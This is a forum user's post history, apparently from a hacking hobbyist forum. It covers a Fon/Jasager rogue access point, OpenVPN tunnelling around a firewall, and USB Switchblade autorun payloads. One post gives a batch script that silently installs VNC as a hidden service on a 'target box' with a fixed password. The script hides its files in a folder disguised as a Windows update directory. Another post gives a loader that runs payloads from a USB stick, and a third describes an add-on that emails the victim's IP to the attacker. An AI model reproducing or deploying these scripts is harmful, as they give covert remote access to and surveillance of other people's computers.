Jump to content

Nakaori

Active Members
  • Posts

    22
  • Joined

  • Last visited

Everything posted by Nakaori

  1. i got a fon 2100 since the first version of jasager. i never put it to use, because configuring it, was a pain in the ass :) looking forward to mk3
  2. Nice one! this is very easy to install and shows how well everything can work :) good job!
  3. Hey guys, okay i got the fon since over a year now and i didnt get to field test it yet. i played around with it some time but never reached to get it working properly. first the basics: - Windows XP Netbook - connected to the internet via wifi: # IP is 192.168.0.144 # Gateway is 192.168.0.1 - connected to the fon via ethernet: #IP is 192.168.1.2 - FON - Connected to the netbook via ethernet: # IP is 192.168.1.1 #Gateway is 192.168.1.1 - Connected to power via USB now when i set up the computer to act as bridge between my wifi and my ethernet, the fon works. it lets ppl connect, but i cant get onto the internet with the netbook anymore. i cant use ics because the network i'm in is 192.168.0.0... so i need to use some bridging or an external tool to accomplish that. any suggestions? next problem is, how do i get the fonera to act as an dhcp server, so that the pook will be 192.168.1.0 instead of 192.168.0.0? does anyone have a working layout for using with fonera and windows xp, without internet connection sharing?
  4. am i getting this right? is the purpose of this thing to connect to a wifi network and share this connection to another wifi, lets say the network of jasager? when its like that, it would be win.. but i cant imagine doing that without having two wifi modules in the fon.. Oo
  5. thats not the thing anymore.. i reflashed the fon and i got static ip again. now, is there a way to remain on static? i.e. adding the nameservers to resolv.conf and route add default gw? what would the default gw be then? it should be the ip adress bound to the ethernet interface wired to the fon right? //EDIT: Alright i got it working... more or less.. i set up masquerading which is ics for linux. the mark gets an ip adress from the dhcp server on my eee. after setting the default gw and adding the nameservers from opendns.org i can ping google from my fon. i cant ping google on the marks pc. i CAN ping googles ip from the marks pc. so the problem now is, that i dont deliver a valid dns server to the marks pc. any ideas on this? //EDIT 2: I GOT IT! you have to redirect the dns requests. this isnt done with adding the dns to resolv.conf. you have to edit the /etc/dnsmasq.conf and add the following line: dhcp-option=6,X1X.X1X.X1X.X1X,X2X.X2X.X2X.X2X where X1X is the first dns server and X2X the second one. perhaps the servers from opendns? ;)
  6. hi, sorry for confusing. i cant actually ssh in.. i can only connect to the "openwrt" wifi. but cant find the ip from the router. i am using linux as the donor pc.. the connection is shared via firestarter with dhcp3 server.
  7. ok. i am reflashing my fon for the 3rd time right now and i cant get the ics tutorial to work with my fon and eee-pc. i am doing exactly what is written in the tut but after doing the dhcp step in webif and then rebooting the fon, it remains unreachable. i think the fon then waits for an adress on boot, which it cant get right.. did anyone try a way to remain on static ip and use a gateway manually? //edit: what i already tried is sshing in and route add default gw 192.168.0.20 192.168.0.20 is my eees wired interface which gets internet through firestartes connection sharing (SHOULD)
  8. i am currently using a vpn tunnel... all ports opened at once... very comfortable.
  9. http://sourceforge.net/projects/magicmap http://www2.informatik.hu-berlin.de/rok/MagicMap/index.htm have phun :>
  10. Nakaori

    OpenVPN

    mh. the thing is, that i want to know who is on the other end. on hamachi, you arent the other end. would be cool, if you could give me a hand. ill post configfiles if you need. //edit: alrite. I got it running now. But it's a little ineffective. i am running a squidproxy which does the work for the gateway. and this one is sooooo slow. and all that, because i cant get the routing to work..
  11. Nakaori

    OpenVPN

    Hey. I need some help setting up my openVPN network.. the situation. i need to get around a firewall. i have the idea of using openVPN to tunnel my connection to a vpnserver at home. this vpn server is usually called 192.168.0.4. The router is 192.168.0.1 i am using 10.1.0.1 as the internal tunnelip for 192.168.0.4 and 10.1.0.2 for the openvpn client. got that? good. the problem now, is to setup openvpn to use the "192.168.0.4" at home and tunnel all traffic to it.. is that possible? and how?
  12. ye. youll need a script to do that. on the usb switchblade package list on the wiki, there are some loaders. theres one written by me with help from amish, which does all this, without the scriptserver needed to be running
  13. Nakaori

    phpbb hack ?!?

    is it just me, who thinks leet slang sucks? nah anyways. nice try.
  14. ok. i try to make a u3 automatic launcher in batch. the point why i started to do this, is because my boxes at home all have scripting host set to off.. i like to have a switchblade which runs everywhere. here's my code: @echo off :: OK this line is searching for the payload on all available drives. It looks for the WIPyougotowned.cmd for %%i in ( A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do @if exist %i:WIPyougotowned.cmd Set "drv=%i:" if not defined drv goto :eof :PAYLOAD :: This line executes the payload on the detected drive. Echo executing payload from drive %drv% nircmd %drv%WIPyougotowned.cmd :eof however this code doesnt work. it seems like it doesnt see the yougotowned.cmd.. ;( i really need help with that //EDIT: Ok. I might want to edit the tread saying "amish fixxe dit becaue he is the best ;) thanks to you dude Here is the loader: @echo off for %%i in (B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:youwillbehackedsoon.txt set dir=%%i cd /d %dir%: call WIPCMDgo.cmd
  15. does this flash any usb u3 stick to autorun my own files? do i get this right? //edit: nvm. it works on a extrememory 1gig too..
  16. did you use my vnc installer? the emailer currently doesnt really work. there's an error in the autostart procedure, when the batch file is making the links to the autostart folder.. i am currently figuring this out. ill upload an updated version asap.
  17. i made a little addon for this. now it automatically starts a hidden batchfile which sends you the current external ip every 30 minutes to a specified email account. credits to gonffen for helping me with the ip getter :> btw. available on the wiki ;)
  18. ok. i wrote a little thing that installs VNC as a service on the target box. @echo off :: This batch file installs VNC automatically with the :: password set to "yougothacked". :: You can use this batchfile with the USB Switchblade so it :: installs silently. It will remove the VNC icon with a little :: hack. It will also set the directory to invisible. :: Hope you like it :) :: Always trust your technolust! :start :: This is the same as Darrens Method on the Hacksaw. It creates a directory in the windows directory when you are logged in as admin. Otherwise it does the same in the appdate folder. mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn" :: Changing directory to the VNC installation files cd ../VNCInstallFiles :: Copying the necessary files to the harddrive. copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn" :: We set the files to hidden here attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h :: Here are some regedit entries which have to be there, to allow the VNC Server to run as a service regedit /s ../CMD/vncdmp.reg regedit /s ../CMD/vncdmp1.reg regedit /s ../CMD/vncdmp2.reg :: A little pause before... ping -n 1 localhost > nul :: ...we start the VNC Service. net start WinVNC available on the wiki
  19. so theres no way of doing this in sp0 sp1.. mhh.
  20. hi. i have a little problem with that genious developement. if i put this non u3 on my usb key and plug it into my sp0 or sp1 machine, it just does not do anything. theres no auto play window at all.. if i rightclick the drive and select auto play it opens an empty window. anyone with the same problem or someone who knows how to fix it?
×
×
  • Create New...